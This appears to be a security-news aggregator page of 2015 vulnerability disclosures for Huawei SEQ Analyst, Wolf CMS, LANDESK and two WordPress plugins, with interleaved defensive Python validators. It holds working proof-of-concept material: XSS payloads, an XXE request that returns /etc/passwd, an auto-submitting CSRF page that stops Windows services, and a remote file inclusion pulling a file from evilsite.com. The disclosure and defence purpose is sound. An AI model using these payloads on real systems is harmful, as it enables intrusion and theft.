Channel: BOT24

Huawei SEQ Analyst - Multiple Reflected Cross Site Scripting (XSS)

#Document Title:
============
Huawei SEQ Analyst - Multiple Reflected Cross Site Scripting (XSS)

#Release Date:
===========
15 Apr 2015

#CVE-ID:
=======
CVE-2015-2347

#Product & Service Introduction:
=======================
SEQ Analyst is a platform for business quality monitoring and management by
individual users and multiple vendors in a quasi-real-time and retraceable
manner.
More details and manual:
http://download.huawei.com/download/filedownload.do?modelID=bulletin&refID=IN0000056669,101

#Vulnerability Disclosure Timeline:
========================
3 Mar 2015    Bug reported to the vendor.
6 Mar 2015    Vendor replied; investigating.
16 Mar 2015   Asked about the case.
16 Mar 2015   Vendor validated the issue.
17 Mar 2015   No fix for the issue yet.
18 Mar 2015   CVE number assigned.
15 Apr 2015   Fixed.

#Affected Product(s):
===============
Huawei Technologies Co. Ltd.
Product: Huawei SEQ Analyst V200R002C03LG0001SPC100 (other versions may be
vulnerable)

#Exploitation Technique:
=================
Local, Authenticated

#Technical Details:
========================
Sample Payload : 261e9<script>alert(1)</script>57114
Affected Path/Parameter: [4 parameters]
    /common/flexdata.action
        [command XML parameter]
    /monitor/flexdata.action
        [command XML parameter]
        [module XML parameter]
    /psnpm/flexdata.action
        [command XML parameter]

#Proof of Concept (PoC):
==================
https://drive.google.com/folderview?id=0B-LWHbwdK3P9fnBlLWZqWlZqNnB0b2xHWFpYUWt3bmY3Y0lPUHVLNm9VTUlFcWhYTHlZSUU&usp=sharing

#Solution Fix & Patch:
================
15 Apr 2015    Fixed version --> SEQ Analyst V200R002C03LG0001CP0022

#Credits & Authors:
==============
Ugur Cihan Koc
@_uceka_
www.uceka.com

Huawei SEQ Analyst - XML External Entity Injection (XXE)

#Document Title:
============
Huawei SEQ Analyst - XML External Entity Injection (XXE)

#Release Date:
===========
15 Apr 2015

#CVE-ID:
=======
CVE-2015-2346

#Product & Service Introduction:
=======================
SEQ Analyst is a platform for business quality monitoring and management by
individual users and multiple vendors in a quasi-real-time and retraceable
manner.
More details and manual:
http://download.huawei.com/download/filedownload.do?modelID=bulletin&refID=IN0000056669,101

#Vulnerability Disclosure Timeline:
========================
3 Mar 2015    Bug reported to the vendor.
6 Mar 2015    Vendor replied; investigating.
16 Mar 2015   Asked about the case.
16 Mar 2015   Vendor validated the issue.
17 Mar 2015   No fix for the issue yet.
18 Mar 2015   CVE number assigned.
15 Apr 2015   Fixed.

#Affected Product(s):
===============
Huawei Technologies Co. Ltd.
Product: Huawei SEQ Analyst V200R002C03LG0001SPC100 (other versions may be
vulnerable)

#Exploitation Technique:
=================
Local, Authenticated

#Technical Details:
========================
Target Path: /monitor/flexdata.action
Sample Payload : <!DOCTYPE foo [<!ENTITY xxe00c70 SYSTEM "file:///etc/passwd"> ]>
Affected Parameter: req

#Proof of Concept (PoC):
==================
https://drive.google.com/file/d/0B-LWHbwdK3P9YnVvYXFFZWZKc0k/view?usp=sharing

Request:

POST /monitor/flexdata.action HTTP/1.1
Host: ***:8443
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: JSESSIONID=C07AC243148F4C6F7677E90C1085C2D3;
org.springframework.web.servlet.i18n.CookieLocaleResolver.LOCALE=en_US;
locale=en_US; locked=false;
timeNum=1425365144829; timeState=true; loginUserName=testsms;
CASTGC=TGT-549-skiUgOJowwMXhTwxQ4bH1iHB2XKWmKcJVLJYIlthZ56kqJ9yAZ-cas; lockScreen=false
Connection: keep-alive
Referer: https://***:8443/monitor/flexrelease/AllNetMonitor.swf/[[DYNAMIC]]/5
Content-type: application/x-www-form-urlencoded
Content-Length: 136

req=<!DOCTYPE%20foo%20[<!ENTITY%20xxe00c70%20SYSTEM%20"file%3a%2f%2f%2fetc%2fpasswd">%20]><Req>%0a%20%20<command>bizLicenseSetting%26xxe00c70%3b<%2fcommand>%0a<%2fReq>&rdm=Tue%20Mar%203%2008%3A45%3A50%20GMT%2B0200%202015

Response:

HTTP/1.1 200 OK
Date: Tue, 03 Mar 2015 06:46:29 GMT
Server: Apache-Coyote/1.1
Cache-Control: no-cache, no-store
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Vary: Accept-Encoding
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Length: 4281
<html>
<head>
<style type="text/css">

<tr class="row_even">
<td class="cell_object">1</td>
<td class="cell_object">2〕Command is
bizLicenseSettingnobody:x:65534:65533:nobody:/var/lib/nobody:/bin/false
bin:x:1:1:bin:/bin:/bin/false
daemon:x:2:2:Daemon:/sbin:/bin/false
ftp:x:40:49:FTP account:/srv/ftp:/bin/false
root:x:0:0:root:/root:/bin/bash
messagebus:x:103:101:User for D-Bus:/var/run/dbus:/bin/false
ntp:x:74:102:NTP daemon:/var/lib/ntp:/bin/false
ftpsecure:x:104:65534:Secure FTP User:/var/lib/empty:/bin/false
polkituser:x:105:103:PolicyKit:/var/run/PolicyKit:/bin/false
haldaemon:x:106:104:User for haldaemon:/var/run/hald:/bin/false
sshd:x:71:65:SSH daemon:/var/lib/sshd:/bin/false
webserver:x:360:1800::/home/webserver:/bin/bash
ecmftp:x:1000:1800::/opt/pub/software:/bin/bash
ftptest:x:1001:1800::/opt/webserver/workspaces/ftp:/bin/bash
httpd:x:361:1801::/home/httpd:/bin/bash
cognos:x:1002:1802::/home/cognos:/bin/bash
ftptrace:x:1003:1800::/opt/webserver/workspaces/ftp/traceserver:/bin/bash
ftpsoc:x:1004:1800::/opt/pub/software:/bin/bash
ftprtmu:x:1005:1800::/opt/webserver/workspaces/ftp/rtmu:/bin/bash</td>
</tr>
<tr class="row_odd">
...
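As an added example (not part of the advisory and not Huawei's code): a Python check that decodes a form body like the captured request above, flags the DOCTYPE and the external entity declaration in the req parameter, and parses the benign form of the same command with an expat parser that refuses any DTD. Both sample bodies are constructed from the request shown.

```python
import re
import xml.parsers.expat
from urllib.parse import parse_qs

# Constructed sample bodies: the captured request body above re-assembled on
# one line, and the same command as the client would normally send it (no DTD).
CAPTURED_BODY = (
    "req=<!DOCTYPE%20foo%20[<!ENTITY%20xxe00c70%20SYSTEM%20"
    '"file%3a%2f%2f%2fetc%2fpasswd">%20]><Req>%0a%20%20<command>'
    "bizLicenseSetting%26xxe00c70%3b<%2fcommand>%0a<%2fReq>"
    "&rdm=Tue%20Mar%203%2008%3A45%3A50%20GMT%2B0200%202015"
)
BENIGN_BODY = "req=<Req>%0a%20%20<command>bizLicenseSetting<%2fcommand>%0a<%2fReq>&rdm=x"

# An entity declaration with an external identifier: a file or URL read.
ENTITY_DECL = re.compile(r"<!ENTITY\b[^>]*\b(SYSTEM|PUBLIC)\b", re.IGNORECASE)


def inspect_request(body: str) -> dict:
    """Decode the form body and report DTD use in the 'req' XML parameter.

    Returns the decoded XML plus the flags a WAF rule or log-review script
    would key on: whether any DOCTYPE is present, and whether an entity
    declaration carries a SYSTEM/PUBLIC identifier.
    """
    req = parse_qs(body, keep_blank_values=True).get("req", [""])[0]
    has_doctype = "<!DOCTYPE" in req.upper()
    has_external_entity = ENTITY_DECL.search(req) is not None
    return {
        "req": req,
        "has_doctype": has_doctype,
        "has_external_entity": has_external_entity,
        "suspicious": has_doctype or has_external_entity,
    }


class DtdRejected(ValueError):
    """Raised when the XML document carries a DOCTYPE of any kind."""


def parse_without_dtd(xml_text: str) -> dict:
    """Parse with expat but abort on any DOCTYPE, before entities can be declared.

    No DTD means no entity declarations, so the parser can never be asked to
    read file:///etc/passwd or fetch a remote URL. Returns {tag: text} for the
    elements that carry non-blank text.
    """
    parser = xml.parsers.expat.ParserCreate()
    texts, stack = {}, []

    def start_doctype(name, sysid, pubid, has_internal_subset):
        # Raising here stops the parse; expat re-raises it from Parse().
        raise DtdRejected(f"DOCTYPE {name!r} not allowed")

    def start_element(tag, attrs):
        stack.append(tag)
        texts.setdefault(tag, "")

    def char_data(data):
        if stack:
            texts[stack[-1]] += data

    parser.StartDoctypeDeclHandler = start_doctype
    parser.StartElementHandler = start_element
    parser.EndElementHandler = lambda tag: stack.pop()
    parser.CharacterDataHandler = char_data
    parser.Parse(xml_text, True)
    return {tag: text.strip() for tag, text in texts.items() if text.strip()}
```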

#Solution Fix & Patch:
================
15 Apr 2015    Fixed version --> SEQ Analyst V200R002C03LG0001CP0022

#Credits & Authors:
==============
Ugur Cihan Koc
@_uceka_
www.uceka.com

PCI COUNCIL PUBLISHES REVISION TO PCI DATA SECURITY STANDARD

Golang data races to break memory safety

Go is becoming more and more popular as a programming language and getting more scrutiny from a security point of view. You might remember my heap corruption during garbage collection post. A few days ago Scott Piper wrote Looking for security trouble spots in Go code, an interesting read.

I'd like to expand on a topic I researched a few months ago after discussing it with Dmitry Vyukov (ASAN, TSAN, core Go contributor). He once mentioned on the public Go mailing list that you can break the memory safety of Go with data races, and it piqued my interest, so we'll explore that in this post with some exploits.


RpcView 0.1.5 released

Dropbox users continue to unwittingly leak tax returns and other private data

Readers with good memories will recall a worrying privacy hole was found in Dropbox after publicly accessible links to private personal information stored on the service leaked out to unauthorised users.

The issue was stumbled across by rival file-sharing service Intralinks, which focuses on the enterprise market.

more here.........https://grahamcluley.com/2015/04/dropbox-leak-tax-return/

Impacket

Impacket is a collection of Python classes for working with network
protocols. Impacket is mostly focused on providing low-level
programmatic access to the packets; however, some protocols (for
instance NMB and SMB) are implemented at a higher level as a
foundation for other protocols. Packets can be constructed from
scratch, as well as parsed from raw data, and the object-oriented API
makes it simple to work with deep hierarchies of protocols.

Impacket is most useful when used together with a packet capture
utility or package such as Pcapy, an object oriented Python extension
for capturing network packets.

more here.......https://github.com/CoreSecurity/impacket

Introducing Burp Collaborator

Today's release of Burp Suite introduces Burp Collaborator. This new feature has the potential to revolutionize web security testing. Over time, Burp Collaborator will enable Burp to detect issues like blind XSS, server-side request forgery, asynchronous code injection, and various as-yet-unclassified vulnerabilities.

In the coming months, we will be adding many exciting new capabilities to Burp, based on the Collaborator technology. See the "Release roadmap" section towards the end of this post for more details.

This blog post looks at:
Some important limitations of the conventional web testing model.
How Burp Collaborator will address these limitations.
Lots of real-world vulnerabilities that don't fit into the usual classifications.

more here.....http://blog.portswigger.net/2015/04/introducing-burp-collaborator.html

Integrating Moloch & Cuckoo Sandbox

Moloch is a powerful network capture and indexing system which is increasingly commonly used in corporate networks to monitor traffic and identify malicious activity.
By integrating Cuckoo and Moloch, we'd be able to create a fully open source sandnet capable of extracting malicious artifacts on-the-fly and requesting Cuckoo to analyze them.

more here........https://github.com/cuckoobox/cuckoo/issues/523

Wolf CMS 0.8.2 Arbitrary File Upload Vulnerability

 ,--^----------,--------,-----,-------^--,
| ||||||||| `--------' | O .. CWH Underground Hacking Team ..
`+---------------------------^----------|
`\_,-------, _________________________|
/ XXXXXX /`| /
/ XXXXXX / `\ /
/ XXXXXX /\______(
/ XXXXXX /
/ XXXXXX /
(________(
`------'

Exploit Title : Wolf CMS Arbitrary File Upload Exploit
Date : 16 April 2015
Exploit Author : CWH Underground
Discovered By : ZeQ3uL
Site : www.2600.in.th
Vendor Homepage : https://www.wolfcms.org/
Software Link : https://bitbucket.org/wolfcms/wolf-cms-downloads/downloads/wolfcms-0.8.2.zip
Version : 0.8.2

####################
SOFTWARE DESCRIPTION
####################

Wolf CMS is a content management system and is Free Software published under the GNU General Public License v3.
Wolf CMS is written in the PHP programming language. Wolf CMS is a fork of Frog CMS.

#######################################
VULNERABILITY: Arbitrary File Upload
#######################################

This exploits a file upload vulnerability found in Wolf CMS 0.8.2, and possibly prior versions. An attacker can abuse the
upload feature to upload a malicious PHP file into the application as an authenticated user, which results in
arbitrary remote code execution.

The vulnerability was found in the File Manager function (enabled by default), which provides interfaces to manage files
from the administration area.

In this simple example, no restrictions are made regarding the type of files allowed for uploading.
Therefore, an attacker can upload a PHP shell file with malicious code that can lead to full control of the victim
server.
Additionally, the uploaded file can be moved to the root directory, meaning that the attacker can access it through the
Internet.

/wolf/plugins/file_manager/FileManagerController.php (LINE: 302-339)
-----------------------------------------------------------------------------
// Clean filenames: spaces become '_', then anything outside [a-z0-9_.-] is dropped.
// Nothing here restricts the extension, so a .php name passes through unchanged.
$filename = preg_replace('/ /', '_', $_FILES['upload_file']['name']);
$filename = preg_replace('/[^a-z0-9_\-\.]/i', '', $filename);

if (isset($_FILES)) {
    $file = $this->_upload_file($filename, FILES_DIR . '/' . $path . '/', $_FILES['upload_file']['tmp_name'], $overwrite);

    if ($file === false)
        Flash::set('error', __('File has not been uploaded!'));
}
-----------------------------------------------------------------------------
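An added example (not Wolf CMS code): the two preg_replace() calls above reproduced in Python next to a hardened version that adds an extension allowlist. The extension sets are assumptions for the example and would need to match the real web server configuration.

```python
import os
import re

# Assumed policy for this example (not Wolf CMS configuration): extensions the
# web server would execute, and the only ones an upload may carry.
EXECUTABLE_EXTENSIONS = {"php", "php3", "php4", "php5", "phtml", "phar", "htaccess"}
ALLOWED_EXTENSIONS = {"jpg", "jpeg", "png", "gif", "pdf", "txt"}


def wolf_clean_filename(name: str) -> str:
    """Python equivalent of the two preg_replace() calls: spaces become '_',
    then every character outside [a-z0-9_.-] is dropped. Nothing here looks
    at the extension, so 'shell.php' passes unchanged."""
    name = name.replace(" ", "_")
    return re.sub(r"[^a-z0-9_\-.]", "", name, flags=re.IGNORECASE)


def hardened_filename(name: str) -> str:
    """Character cleaning plus an extension allowlist; raises ValueError on a
    name the server might execute. Every dotted segment is checked, so
    'shell.php.jpg' and '.htaccess' are rejected, not only the last one."""
    cleaned = wolf_clean_filename(os.path.basename(name))
    base, *exts = cleaned.lower().split(".")
    if not base or not exts:
        raise ValueError(f"rejected {name!r}: missing base name or extension")
    if any(ext in EXECUTABLE_EXTENSIONS for ext in exts):
        raise ValueError(f"rejected {name!r}: executable extension")
    if exts[-1] not in ALLOWED_EXTENSIONS:
        raise ValueError(f"rejected {name!r}: .{exts[-1]} is not an allowed type")
    return cleaned
```

The allowlist is a second line of defence only; the upload directory should also be served with script execution disabled.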

#####################
Disclosure Timeline
#####################

[04/04/2015] – Issue reported to the developer team
[08/04/2015] – Discussed fixing the issue

################################################################################################################
# Greetz : ZeQ3uL, JabAv0C, p3lo, Sh0ck, BAD $ectors, Snapter, Conan, Win7dos, Gdiupo, GnuKDE, JK, Retool2
################################################################################################################

[CVE-2014-5361][CVE-2014-5362]Landesk Management Suite RFI & CSRF Security Vulnerabilities

Exploit Title: Landesk Management Suite RFI and CSRF vulnerabilities
Product: Landesk Management Suite
Vulnerable Versions: 9.5 (and possible previous versions), 9.6
Tested Version: 9.5
Advisory Publication: 16/04/2015
Latest Update: 16/04/2015
Vulnerability Type: Cross-site request forgery [CWE-352], Remote File Inclusion [CWE-829]
CVE Reference: CVE-2014-5361, CVE-2014-5362
Credit: Alex Haynes

Advisory Details:


(1) Vendor & Product Description
--------------------------------

Vendor:
LANDESK

Product & Version:
Landesk Management Suite v9.5

Vendor URL & Download:
http://www.landesk.com/products/management-suite/

Product Description:
"Manage all your users’ multi-platform desktops and mobile devices. Integrate several IT disciplines
into a single management experience that speeds software distribution, ensures software license compliance,
simplifies OS provisioning, saves power costs, provides secure remote control, and manages Mac OS X."


(2) Vulnerability Details:
--------------------------
The admin interface of Landesk Management Suite can be exploited by Remote File Inclusion (RFI) and Cross-site Request
forgery (CSRF) attacks.

Proof of concept for CSRF [CVE-2014-5361]:
-----------------------------------------
URL:
https://<LANDESK>/remote/serverServices.aspx?cidn=5&d=serverServices&tb=serverInfo_services.tb&gid=groupSW_Services&itemid=SW_Services&UID=SW_Services_SW_ROOT
Attack Pattern:

Certain functionalities of LANDESK are vulnerable to cross-site request forgery, which can be used to force users to,
among other things, manipulate Windows services and processes on host machines.

Example code below:
<!-- CSRF for Landesk, allowing stop, start or restart of arbitrary services OR processes on host machine -->
<html>
<head>
<script>
// For illustration only, Skype and Adobe Acrobat Update Services are shut down. Replace with any Windows service on the host machine.
window.onload = function() {
    document.getElementById("csrfForm1").submit();
    document.getElementById("csrfForm2").submit();
}
</script>
</head>
<body>
<form id="csrfForm1"
      action="https://landesk/remote/serverServices.aspx?cidn=5&d=serverServices&tb=serverInfo_services.tb&gid=groupSW_Services&itemid=SW_Services&UID=SW_Services_SW_ROOT"
      method="POST" enctype="multipart/form-data" target="csrfIframe1">
    <input type="hidden" name="op" value="stop" />
    <input type="hidden" name="name" value="Adobe Acrobat Update Service" />
</form>

<form id="csrfForm2"
      action="https://landesk/remote/serverServices.aspx?cidn=5&d=serverServices&tb=serverInfo_services.tb&gid=groupSW_Services&itemid=SW_Services&UID=SW_Services_SW_ROOT"
      method="POST" enctype="multipart/form-data" target="csrfIframe2">
    <input type="hidden" name="op" value="stop" />
    <input type="hidden" name="name" value="Skype Updater" />
</form>

<iframe style="display:none" height="0" width="0" frameborder="0" name="csrfIframe1"></iframe>
<iframe style="display:none" height="0" width="0" frameborder="0" name="csrfIframe2"></iframe>
</body>
</html>


Proof of concept for RFI [CVE-2014-5362]:
-----------------------------------------

There are numerous URLs within the LANDESK Management Suite that can be used to call upon remote files, due to the use
of relative paths. This can be leveraged to introduce remote file inclusion vulnerabilities, as you can present external
content through the LANDESK server.

URLs:
https://<LANDESK>/ldms/sm_actionfrm.asp?cmd=dir&ht=1&d=//<RFI here>
https://<LANDESK>/remote/frm_coremainfrm.aspx?tb=cust_qry.tb&d=//<RFI here>&bfn=swd_top&node=4&baseType=group1&groupID=1646&groupType=null&ownerID=56
https://<LANDESK>/remote/frm_splitfrm.aspx?top=//<RFI here>&ttb=dirman.tb&ftr=frm_tasktabsfrm&tabf=dirman_tabs&tf=dirman_top&bottom=frm_taskfrm&bbd=SoftwareDistribution/ldaplist&bf=dirlist_bottom&bd=frm_coremainfrm&btb=dirlist.tb&pct=50

Parameter names: "d" & "top"
Parameter Type: GET
Attack Pattern:
The remote file must end in .aspx, but the extension is not referenced explicitly in the URL. It will be fetched over
HTTPS.
d=//<any external URL here>/<filenamehere>(.aspx)
Example:
https://<LANDESK>/ldms/sm_actionfrm.asp?cmd=dir&ht=1&d=//evilsite.com/myevilaspxfile
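An added example (not LANDESK code): how a value beginning with "//" joined to a relative base ends up on another host, next to a validator for a d=/top=-style parameter that refuses it. The base URL and function names are constructed for the example.

```python
import posixpath
from urllib.parse import urljoin, urlsplit

# Constructed base for the example; the advisory's URLs sit under https://<LANDESK>/ldms/.
BASE = "https://landesk.example/ldms/"


def resolve_include(param: str, base: str = BASE) -> str:
    """Naive resolution of a d=/top= value: join it to the page's base and add
    the implicit .aspx extension the advisory describes. A value beginning
    with '//' is a network-path reference, so the join swaps the host: that
    is the remote file inclusion above."""
    return urljoin(base, param + ".aspx")


def safe_include(param: str, base: str = BASE) -> str:
    """Accept only a relative path that stays under base, then re-check the
    resolved URL. Rejects schemes, '//host' and backslash forms, absolute
    paths and directory traversal."""
    if not param or "\\" in param or param.startswith("//"):
        raise ValueError(f"rejected {param!r}: empty, backslash or protocol-relative")
    parts = urlsplit(param)
    if parts.scheme or parts.netloc:
        raise ValueError(f"rejected {param!r}: absolute URL")
    norm = posixpath.normpath(parts.path)
    if norm in ("", ".") or norm.startswith(("/", "..")):
        raise ValueError(f"rejected {param!r}: leaves the base directory")
    resolved = urljoin(base, norm + ".aspx")
    if not resolved.startswith(base):
        raise ValueError(f"rejected {param!r}: resolved outside base")
    return resolved
```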


(3) Advisory Timeline:
----------------------
15/09/2014 - First Contact
23/10/2014 - Request for update on fix. No ETA given.
21/11/2014 - Request for update on fix. No ETA given.
22/12/2014 - Request for update on fix. No ETA given.
22/01/2015 - Request for update on fix. No ETA given.
13/04/2015 - Final request for update and notice of public disclosure given. No ETA for fix.
16/04/2015 - Public disclosure

(4) Solution:
------------
No fix at this time.


(5) Credits:
------------
Discovered by Alex Haynes

References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5361
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5362
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-5361
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-5362

e-LockPicking: Opening Electronic Doors

I bought this lock under the brand of Tafta, but it seems the original manufacturer, which seems to OEM it, is SoHoMiLL YL-99 Electronic Door (pointed out by @revskills).

It is basically a lock which runs on batteries and allows the user to store different code entries. The master code, which has to start with 0, is the one that allows you to change the entry code of any other user (codes start from 1 to 9, so it can have 9 different codes besides the master one). We will later see why each of them starts with a different number.

more here.......http://www.gabrielgonzalezgarcia.com/2015/04/15/e-lockpicking-opening-electronic-doors/

Tuning auditd: High Performance Linux Auditing

The Linux Audit framework is a powerful tool for auditing system events. From running executables up to system calls, everything can be logged. However, all this audit logging comes at the price of performance. In this article we look at how we can optimize our audit rules and keep our Linux system running smoothly.

Good auditd performance will reduce stress on the Linux kernel and lower its impact. Before changing anything on your system, we suggest benchmarking your system performance before and after. This way you can see the benefits of your tuning efforts.

more here....http://linux-audit.com/tuning-auditd-high-performance-linux-auditing/

Freeware: ArkDasm 64-bit interactive disassembler and debugger

Operation Pawn Storm Ramps Up its Activities; Targets NATO, White House

Long-running APT campaign Operation Pawn Storm has begun the year with a bang, introducing new infrastructure and zeroing in on targets including North Atlantic Treaty Organization (NATO) members and even the White House. This is according to the latest intelligence gleaned from Trend Micro’s ongoing research into the attack group, and comes as a follow-up to our widely publicized October 2014 report.

more here........http://blog.trendmicro.com/trendlabs-security-intelligence/operation-pawn-storm-ramps-up-its-activities-targets-nato-white-house/

Fidelis Threat Advisory #1016: Pushdo It To Me One More Time

Once thought to be defunct, the resilient Pushdo has surfaced with infections observed in more than 50 countries, with a substantial infection rate located in the Asia-Pacific region. Based on data aggregated from a controlled sinkhole, Fidelis Cybersecurity has observed some notable changes with the primary command and control (C&C) and conducted in-depth analysis of the secondary C&C Domain Generation Algorithm (DGA). In order to support network defenders, Fidelis Cybersecurity is offering a new, free data feed of verified indicators to support the detection and mitigation of Pushdo. Our intention behind revealing these details is to enable widespread detection and remediation of this threat as well as to force a comprehensive retooling exercise on the operators of the Pushdo botnet.

more here.........http://www.threatgeek.com/2015/04/fidelis-threat-advisory-1016-pushdo-it-to-me-one-more-time.html

GlassWire 1.0.44 Beta

CSRF and stored XSS in WordPress Content Slide allow an attacker to have full admin privileges (WordPress plugin)

Details
================
Software: WordPress Content Slide
Version: 1.4.2
Homepage: http://wordpress.org/plugins/content-slide/
Advisory report: https://security.dxw.com/advisories/csrf-and-stored-xss-in-wordpress-content-slide-allow-an-attacker-to-have-full-admin-privileges/
CVE: Awaiting assignment
CVSS: 6.8 (Medium; AV:N/AC:M/Au:N/C:P/I:P/A:P)

Description
================
CSRF and stored XSS in WordPress Content Slide allow an attacker to have full admin privileges

Vulnerability
================
An attacker able to convince an admin to visit a link of their choosing is able to execute arbitrary JavaScript:
a CSRF vulnerability allows an attacker to change any option in the plugin, and the plugin does not escape content when it is put into HTML, so the attacker can then use JavaScript to perform almost any action an admin can take (including creating new users, executing arbitrary PHP through the theme editor, or exploiting vulnerabilities in WordPress or other plugins which normally require the user to be authenticated as an admin).

Proof of concept
================
While logged into a site with the plugin enabled, open a page containing the following form and click the submit button (in a real attack the form could be made to auto-submit):
<form action="http://localhost/wp-admin/admin.php?page=content-slide/content_slide.php" method="POST">
  <input type="text" name="wpcs_options[no_of_custom_images]" value="1">
  <input type="text" name="wpcs_options[slide_image1]" value="&quot;>&lt;script>alert(1)&lt;/script>">
  <input type="submit">
</form>
If using a browser without reflected XSS mitigation (e.g. Chrome) the admin user will see "1" in an alert box; otherwise a refresh of the page is required before the JavaScript is executed.

Mitigations
================
Disable the plugin until a new version is released that fixes this bug
At the time of publishing no fix is available and the plugin has been removed from the plugin directory

Disclosure policy
================
dxw believes in responsible disclosure. Your attention is drawn to our disclosure policy: https://security.dxw.com/disclosure/

Please contact us on security@dxw.com to acknowledge this report if you received it via a third party (for example, plugins@wordpress.org) as they generally cannot communicate with us on your behalf.

This vulnerability will be published if we do not receive a response to this report within 14 days.

Timeline
================

2014-10-08: Discovered
2014-12-16: Reported to vendor via email form at http://www.snilesh.com/contact-me/
2014-12-16: Requested CVE
2015-01-07: Vendor responded
2015-01-09: Vendor chased
2015-04-09: Vendor had given assurances that a fix would be available, and was given multiple extensions to do so, but by this point they had stopped responding. Emailed plugins@wordpress.org requesting a takedown.
2015-04-16: Confirmed that the plugin is no longer on the directory. Published.

Discovered by dxw:
================
Tom Adams
Please visit security.dxw.com for more information.

Reflected XSS in Citizen Space allows attackers to view sensitive information of the attacker’s choosing (WordPress plugin)

Details
================
Software: Citizen Space
Version: 1.1
Homepage: http://wordpress.org/plugins/citizen-space/
Advisory report: https://security.dxw.com/advisories/reflected-xss-in-citizen-space-allows-attackers-to-view-sensitive-information-of-the-attackers-choosing/
CVE: Awaiting assignment
CVSS: 6.4 (Medium; AV:N/AC:L/Au:N/C:P/I:P/A:N)

Description
================
Reflected XSS in Citizen Space allows attackers to view sensitive information of the attacker’s choosing

Vulnerability
================
It is possible to request pages that will run the attacker's choice of WordPress shortcode and display any content of the attacker's choosing. This allows the attacker to view extremely sensitive data, to create content, to access forms that have been disabled and to greatly aid the exploitation of other plugins.
This can also be exploited to perform simple cross-site scripting (XSS) attacks by injecting HTML into pages, if a user can be tricked into following a link constructed by the attacker. This could be used, e.g., to damage the reputation of the site or another entity, or to trick the user into installing malicious software.
Citizen Space looks at all URLs requested on the site to see if they contain "cs_consultation" anywhere in the URL, including in the parameters. It then looks for the parameter path in the URL; if it is found, it appends it into post_content without sanitising it:
$post->post_content = '[citizenspace_consultation url="'.$_GET['path'].'"]';
This means that the citizenspace_consultation shortcode can be broken out of by adding a closing square bracket (]). This works because the spec for shortcodes in WordPress is strict and says there cannot be any closing square brackets inside a shortcode. Any content placed in the path parameter after the square bracket will be searched for shortcodes, and if any are found they are executed. HTML will also be rendered and JavaScript will be executed.

Proof of concept
================
Assuming a site running on localhost, making this request will inject [shortcodehere] into the page.
http://localhost/?cs_consultation&path="][shortcodehere][[[
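An added example (not the plugin's code): a minimal shortcode scanner standing in for WordPress's, built on the no-closing-bracket rule described above, which shows how the path value from the request adds a second shortcode, next to a hardened builder that restricts the value to URL characters. The regexes and function names are assumptions for the example.

```python
import re

# Minimal stand-in for WordPress's shortcode scanner: '[' + tag name +
# attributes + ']'. As the text above notes, the spec forbids ']' inside a
# shortcode, which is exactly what an attacker-supplied ']' exploits.
SHORTCODE_RE = re.compile(r"\[([a-zA-Z0-9_-]+)([^\]]*)\]")

# Conservative allowlist for the consultation URL value (an assumption for
# this example): no quotes, brackets, angle brackets or whitespace.
URL_VALUE_RE = re.compile(r"[A-Za-z0-9_./:?&=%+-]+")


def build_content_vulnerable(path: str) -> str:
    """Mirror of the plugin line above: the path value is concatenated as-is."""
    return f'[citizenspace_consultation url="{path}"]'


def build_content_hardened(path: str) -> str:
    """Same output, but the value must match URL_VALUE_RE first, so it can
    neither close the attribute quote nor terminate the shortcode."""
    if not URL_VALUE_RE.fullmatch(path):
        raise ValueError(f"rejected path value {path!r}")
    return build_content_vulnerable(path)


def find_shortcodes(content: str) -> list:
    """Tag names a shortcode scanner would execute in this content."""
    return [m.group(1) for m in SHORTCODE_RE.finditer(content)]
```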

Mitigations
================
Disable and remove the plugin. The plugin authors (Delib) have deprecated the plugin and removed it from the plugin directory. They no longer recommend it as a way of integrating Citizen Space with WordPress:
https://delib.zendesk.com/hc/en-us/articles/203432169-Citizen-Space-Wordpress-plug-in
https://delib.zendesk.com/hc/en-us/articles/203432149-How-do-I-integrate-Citizen-Space-into-my-existing-website-

Disclosure policy
================
dxw believes in responsible disclosure. Your attention is drawn to our disclosure policy: https://security.dxw.com/disclosure/

Please contact us on security@dxw.com to acknowledge this report if you received it via a third party (for example, plugins@wordpress.org) as they generally cannot communicate with us on your behalf.

This vulnerability will be published if we do not receive a response to this report within 14 days.

Timeline
================
2015-01-30: Discovered
2015-03-04: CVE requested
2015-03-05: Reported to vendor by email
2015-03-12: Confirmed plan for deprecation
2015-03-31: Plugin confirmed deprecated and removed from WP.org.
2015-04-16: Published

Discovered by dxw:
================
Glyn Wintle
Please visit security.dxw.com for more information.

How do we build encryption backdoors?

They say that history repeats itself, first as tragedy, then as farce. Never has this principle been more apparent than in this new piece by Washington Post reporters Ellen Nakashima and Barton Gellman: 'As encryption spreads, U.S. grapples with clash between privacy, security'.

The subject of the piece is a renewed effort by U.S. intelligence and law enforcement agencies to mandate 'backdoors' in modern encryption systems. This is ostensibly a reaction to the mass adoption of strong encryption in smartphones, and a general fear that police are about to lose wiretapping capability they've come to depend on.

more here.........http://blog.cryptographyengineering.com/2015/04/how-do-we-build-encryption-backdors.html